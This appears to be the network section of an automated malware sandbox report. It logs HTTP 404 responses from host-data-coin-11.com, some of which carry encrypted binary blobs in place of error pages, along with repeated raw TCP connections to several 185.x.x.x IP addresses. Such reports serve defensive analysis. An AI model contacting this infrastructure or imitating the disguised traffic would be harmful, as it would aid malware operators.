                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 7c 0f a5 54 f2 ba 66 f4 39 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a Data Ascii: 31I:82OTev|Tf90
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
